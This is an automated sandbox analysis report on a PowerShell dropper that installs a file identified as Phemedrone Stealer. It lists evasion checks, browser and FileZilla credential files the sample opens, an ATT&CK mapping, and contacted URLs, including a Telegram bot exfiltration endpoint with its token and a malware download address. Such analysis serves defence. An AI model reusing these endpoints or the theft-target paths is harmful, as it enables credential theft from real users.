            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeMemory allocated: 2747DCA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeMemory allocated: 2747F670000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599157Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599032Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598202Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3708Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6170Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWindow / User API: threadDelayed 2848Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599782s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599157s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -599032s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598922s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598438s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598202s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7664Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7580Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599157Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 599032Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598202Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: powershell.exe, 00000000.00000002.1592629717.000001B1EC9AD000.00000004.00000020.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1538367434.000002747FD5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeQueries volume information: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WDSecureUtility_594.exe, 00000003.00000002.1536783632.0000027419362000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400254000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

            Remote Access Functionality

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400254000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WDSecureUtility_594.exe PID: 7560, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Masquerading            		2
            OS Credential Dumping            		341
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol2
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
            Virtualization/Sandbox Evasion            		Security Account Manager251
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials123
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            upd.ps13%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe100%Joe Sandbox ML
            :newads (copy)68%ReversingLabsByteCode-MSIL.Spyware.PhemedroneStealer
            C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe68%ReversingLabsByteCode-MSIL.Spyware.PhemedroneStealer

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://t.me/0%Avira URL Cloudsafe
            https://t.me/freakcodingspot0%Avira URL Cloudsafe
            https://api.telegram.org0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://t.me/TheDyer0%Avira URL Cloudsafe
            https://apitradingview.com100%Avira URL Cloudmalware
            https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            https://api.telegram.org/bot0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://api.tele0%Avira URL Cloudsafe
            https://apitradingview.com/WDSecureUtility.exe100%Avira URL Cloudmalware
            https://get.geojs.io0%Avira URL Cloudsafe
            https://t.me/webster4800%Avira URL Cloudsafe
            http://apitradingview.com100%Avira URL Cloudmalware
            https://get.geojs.io/v1/ip/geo.json0%Avira URL Cloudsafe
            http://api.telegram.org0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            get.geojs.io
            		172.67.70.233
            		truefalse
              		unknown
              api.telegram.org
              		149.154.167.220
              		truetrue
                		unknown
                apitradingview.com
                		86.104.15.60
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocumentfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://apitradingview.com/WDSecureUtility.exefalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://get.geojs.io/v1/ip/geo.jsonfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabWDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://t.me/WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1559813700.000001B181B0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://apitradingview.compowershell.exe, 00000000.00000002.1559813700.000001B181633000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://duckduckgo.com/ac/?q=WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://t.me/freakcodingspotWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.telegram.orgWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoWDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.org/botWDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000000.00000002.1559813700.000001B180C33000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
